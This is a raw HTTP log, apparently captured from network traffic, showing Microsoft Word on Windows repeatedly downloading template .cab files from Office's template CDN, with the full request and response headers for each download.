X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 4DPMvHunh6L4JM4JUuV9RA==
Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
ETag: 0x8D36AC883F49D7D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 333d895c-301e-008a-7b97-a0d19b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:23 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp02851226.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: U+6dpJ0LhDVwOOzzdoONLg==
Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
ETag: 0x8D36AC88440C433
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2e8ae1bb-901e-00ce-4f97-a05ba4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:23 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp02851227.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: karb7EFxz6gpK2GEkvXvNA==
Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
ETag: 0x8D36AC8848A0495
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 13033484-101e-00ef-6b97-a07fdf000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:23 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp0309043001.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: DrxFqg5nzENdB0VDg3H5SA==
Last-Modified: Wed, 29 Aug 2018 18:20:24 GMT
ETag: 0x8D60DDC169CBCB0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c55cc261-b01e-005b-2297-a03f15000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:23 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp02851223.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: IFr1FgTvlu8ejmAhJUH3Qg==
Last-Modified: Fri, 22 Apr 2016 15:41:42 GMT
ETag: 0x8D36AC49A4270D3
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a445c8ca-501e-00f0-1697-a0e807000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:23 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp0309043402.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: dIpTxr3Vzpe9VKdsejNChg==
Last-Modified: Wed, 29 Aug 2018 18:14:30 GMT
ETag: 0x8D60DDB43B59EC5
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3d093d5b-601e-0153-7197-a05713000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:23 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp03328893.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 48ZBc7L0qnq3LhOWqVFL2A==
Last-Modified: Fri, 22 Apr 2016 15:41:57 GMT
ETag: 0x8D36AC4A3175138
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3d2d7caf-b01e-0050-2697-a02761000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:23 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp03328905.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: TvpI7DB+ry+bNGoHPGf8+w==
Last-Modified: Fri, 22 Apr 2016 16:09:46 GMT
ETag: 0x8D36AC886167DDF
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 66a5b05a-401e-0074-0597-a0beda000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:23 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp03328908.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: iamBjmZY1zpztkJSL/hwHw==
Last-Modified: Fri, 22 Apr 2016 15:41:40 GMT
ETag: 0x8D36AC498DE687B
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c5200cc9-a01e-00a1-5597-a0f6f2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:23 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp03328916.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: +RPdhJFXUwQthWzsTl2rpQ==
Last-Modified: Fri, 22 Apr 2016 16:09:47 GMT
ETag: 0x8D36AC886C4C4EE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 621faa23-601e-00ca-3c97-a0d6a3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:23 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp03328919.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: ZsUZnPT7GL1Pnz8sywdABw==
Last-Modified: Fri, 22 Apr 2016 15:41:40 GMT
ETag: 0x8D36AC4992C63CE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f67f6439-f01e-00b9-7e97-a0db67000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:23 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp03328925.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: xH40MK+BPfiwLhy0gp3ZSw==
Last-Modified: Fri, 22 Apr 2016 16:09:48 GMT
ETag: 0x8D36AC8875AEF5A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2f99a54d-f01e-011c-6c97-a02647000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:23 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp0403392101.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: U8X0WyLhM7KNS9O1o1D9vQ==
Last-Modified: Wed, 29 Aug 2018 18:19:46 GMT
ETag: 0x8D60DDC004A49D0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f466f8b0-201e-0010-2f97-a04f42000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp03328932.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: SGy8siO4cxMv+vS4rQrQRA==
Last-Modified: Fri, 22 Apr 2016 16:09:49 GMT
ETag: 0x8D36AC887A4CC19
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 867275a6-c01e-0037-5197-a05886000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:23 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp0403391901.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: v5XpZ+fRzsjv5Ca8ASfT3g==
Last-Modified: Wed, 29 Aug 2018 18:16:09 GMT
ETag: 0x8D60DDB7EAA50F0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ceee4029-b01e-00bb-2c97-a03088000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp03328935.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: fGRexQWYL+Up0OUDWzeP/A==
Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
ETag: 0x8D36AC49996C1E0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8477cc39-f01e-00df-0497-a0693d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp03328940.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: e/iLPKIOtx7UU6M2GQjgEA==
Last-Modified: Fri, 22 Apr 2016 16:09:50 GMT
ETag: 0x8D36AC8883A8134
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3aee714a-001e-0065-6f97-a0246e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp1000111502.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: k/qfd5Ugqy0irE6oZLe7NA==
Last-Modified: Thu, 12 Jul 2018 00:23:55 GMT
ETag: 0x8D5E78DC0BDFFD8
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4fca6d0a-e01e-006a-5297-a064c2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp03328951.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 75y4vfvAjwO+9RmtZrpkLw==
Last-Modified: Fri, 22 Apr 2016 16:09:50 GMT
ETag: 0x8D36AC8888436CF
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8b7f2b9c-601e-00da-3797-a013cb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp03328972.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 0wrSbbtt7KT90pT0jtrVXQ==
Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
ETag: 0x8D36AC49A0B8087
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 61a54fca-701e-0020-6497-a054a5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp03328975.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 7gEpx8waySu8PWyw9lP8rg==
Last-Modified: Fri, 22 Apr 2016 16:09:51 GMT
ETag: 0x8D36AC889183E51
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 428ca147-801e-0139-1997-a08f3b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp03328983.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 5TIDh2JQP/oTcd8D+i4iLQ==
Last-Modified: Fri, 22 Apr 2016 16:09:52 GMT
ETag: 0x8D36AC88963C8B3
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 719e0bb9-a01e-0053-5c97-a0a91e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp03328986.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: iyn6tQb9ZcIcnNb+a7vBRg==
Last-Modified: Fri, 22 Apr 2016 15:41:42 GMT
ETag: 0x8D36AC49A9463F7
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 954c7b2e-e01e-0048-5b97-a00af4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp03328990.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: uab/cVcZ7p3hZCGrmDynRQ==
Last-Modified: Fri, 22 Apr 2016 16:09:53 GMT
ETag: 0x8D36AC88A1DF716
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6d182899-901e-0083-4897-a09448000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Sun, 26 May 2024 21:49:25 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.17.251.17:443RequestGET /support/templates/en-us/tp03328998.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: l/W3t+nhKBmZRopcQssS5w==
Last-Modified: Fri, 22 Apr 2016 16:09:53 GMT
ETag: 0x8D36AC88A7F05EE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8e84b2b1-401e-004b-3297-a07679000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
